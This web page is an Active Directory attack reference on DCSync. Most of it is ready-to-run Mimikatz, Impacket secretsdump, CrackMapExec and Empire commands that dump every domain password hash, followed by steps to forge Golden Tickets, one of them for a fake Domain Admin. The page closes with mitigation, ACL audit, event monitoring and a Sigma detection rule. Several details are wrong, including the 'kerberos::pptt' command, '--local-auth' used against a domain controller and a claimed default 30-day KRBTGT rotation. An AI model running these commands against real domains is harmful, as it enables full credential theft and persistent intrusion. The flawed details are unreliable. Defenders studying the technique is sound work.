Home / Active Directory / DCSync
Critical Severity | T1003.002

🔓 DCSync Attack

MITRET1003.002
PlatformWindows AD
PhaseCredential Access
DifficultyMedium

🧠 Description

DCSync simulates the behavior of a Domain Controller and requests password hashes from other Domain Controllers via the Directory Replication Service (DRS) protocol. This technique allows attackers to extract all password hashes from the domain without directly accessing the NTDS.dit file.

Why DCSync Works:
  • Valid Replication Request: DCs naturally replicate with each other
  • No NTDS Access: Don't need to directly access database file
  • Domain-Level Access: Any account with Replicating Directory Changes permissions
  • krbtgt Hash: Allows Golden Ticket creation for persistence

Required Permissions:

  • Replicating Directory Changes (DS-Replication-Get-Changes)
  • Replicating Directory Changes All (DS-Replication-Get-Changes-All)
  • Replicate Directory Changes (ACRp)

Accounts with these rights: Domain Admins, Enterprise Admins, Domain Controller accounts, accounts explicitly granted these permissions.

💣 Execution

Mimikatz - DCSync:

# Get all hashes
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /all" "exit"

# Get specific user hash
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /user:administrator" "exit"

# Get krbtgt hash for golden ticket
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /user:krbtgt" "exit"

# Get krbtgt only
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /guid:krbtgt" "exit"

Impacket (Linux):

# Secretsdump - extract all hashes
python3 secretsdump.py corp.com/username:password@dc01.corp.com

# With hash
python3 secretsdump.py corp.com/username@dc01.corp.com -hashes :ntlmhash

# Using credential relay
python3 secretsdump.py -hashes :adminhash corp.com/attacker@dc01.corp.com

# Target specific DC
python3 secretsdump.py corp.com/user:pass@dc02.corp.com

PowerShell (PowerSploit):

# Using PowerView
Import-Module .\PowerView.ps1

# Check who has replication rights
Get-ADObject -SearchBase "DC=corp,DC=com" -Filter {ObjectClass -eq 'group'} -Properties Member | Where-Object { $_.Member -like '*replication*' }

# Perform DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.com /all"'

# Specific user
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.com /user:corp\administrator"'

CrackMapExec:

# Using secretsdump module
crackmapexec smb dc01.corp.com -u username -p password -d corp.com --local-auth -M secretsdump

# With hash
crackmapexec smb dc01.corp.com -u username -H ntlmhash --local-auth -M secretsdump

🎫 Golden Ticket from DCSync

Once you have the krbtgt hash, you can create a Golden Ticket for permanent domain access:

# Get these values from DCSync output:
# - krbtgt NTLM hash
# - Domain SID (S-1-5-21-xxxxx)
# - Domain name (corp.com)
# - Domain Controller FQDN (dc01.corp.com)

# Create Golden Ticket
mimikatz "kerberos::golden /domain:corp.com /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4:krbtgt_ntlm_hash /user:Administrator /ticket:golden.kirbi" "exit"

# Use Golden Ticket
mimikatz "kerberos::pptt golden.kirbi" "exit"

# Now access any resource as DA
dir \\dc01.corp.com\c$

Empire/Covenant:

# Empire
usemodule credentials/invoke-mimikatz
execute
# DC Sync will dump all hashes
# Use krbtgt hash for golden ticket

# Covenant
implant/dcsync
# Select krbtgt account
# Will dump all hashes

🎯 Persistence via DCSync

1. KRBTGT Rotation Abuse:

# DCSync gives you current KRBTGT hash
# Even after password reset, old hash still works for ~21 days
# By default, KRBTGT password changes every 30 days
# Reset it twice to invalidate all existing TGTs

# But you have the old hash, so you can forge TGTs anytime

2. Add Domain Admin via DCSynced Hash:

# Create Golden Ticket with DA privileges embedded
mimikatz "kerberos::golden /domain:corp.com /sid:SID /rc4:HASH /user:FAKE_ADMIN /groups:512 /ticket:evil.kirbi" "exit"

# Groups 512 = Domain Admins
# Now you have TGT that grants DA access without being actual DA

💥 Impact

Potential Damage:
  • Complete Domain Compromise: All password hashes exposed
  • Permanent Access: Golden Ticket from krbtgt hash
  • Pass-the-Hash: Use any user's hash for lateral movement
  • Trust Exploitation: Use krbtgt to access trusted domains
  • Detection Bypass: No files written to disk

🛡️ Mitigation

✅ Primary Controls:
  • Limit Replication Rights: Only DCs should have Replicating Directory Changes
  • Privileged Role Management: Use PIM/JIT for admin tasks
  • Monitor Replication Events: Alert on unexpected DCSync
  • Enable Microsoft Defender for Identity: Detect DCSync
  • Audit ACLs: Find users with replication permissions
  • KRBTGT Rotation: Reset twice during incident response

Audit Replication Permissions:

# Find who has replication rights
Get-ADObject -Filter {(ObjectClass -eq 'user')} -SearchBase "DC=corp,DC=com" -Properties MemberOf, ntSecurityDescriptor | Where-Object { $_.ntSecurityDescriptor -match 'Replicating' }

# PowerView audit
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -SearchBase "DC=corp,DC=com" -ResolveGUIDs | Where-Object { $_.ObjectAceTypeName -eq 'ReplicatingDirectoryChanges' }

# Check group membership for DC accounts
Get-ADGroupMember "Domain Controllers"

🔍 Detection

Event ID Monitoring:

# Event ID 4662 - Directory Service Access
# Logged when Replicating Directory Changes is used
# Check for:
# - Operations on ntDSDIT object
# - Account name of requestor
# - Look for non-DC accounts

Get-WinEvent -FilterHashtable @{LogName='Security';ID=4662} | 
    Where-Object { $_.Message -match 'Replicating' -and $_.Message -notmatch 'Domain Controllers' }

# Event ID 5136 - Directory Service Object Modification
# When object ACLs are modified

# Event ID 4670 - Permissions on object changed

Microsoft Defender for Identity Alert:

MDI Signature: Suspicious replication of directory services

This alert triggers when a non-Domain Controller performs replication operations. It's a clear indicator of DCSync attack.

Sigma Rule:

title: DCSync Attack Detection
id: dcsync-detection
status: experimental
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4662
    ObjectType: 'ntDSDIT'
    AccessMask: 0x100
  filter:
    SubjectDomainName: 'Domain Controllers'
  condition: selection and not filter
level: critical

🛠️ Tools

  • Mimikatz: lsadump::dcsync
  • Impacket (secretsdump): Python implementation
  • PowerView: PowerShell enumeration
  • CrackMapExec: secretsdump module
  • Empire: DCSync module
  • BloodHound: Identify accounts with replication rights

📚 References

Back to Active Directory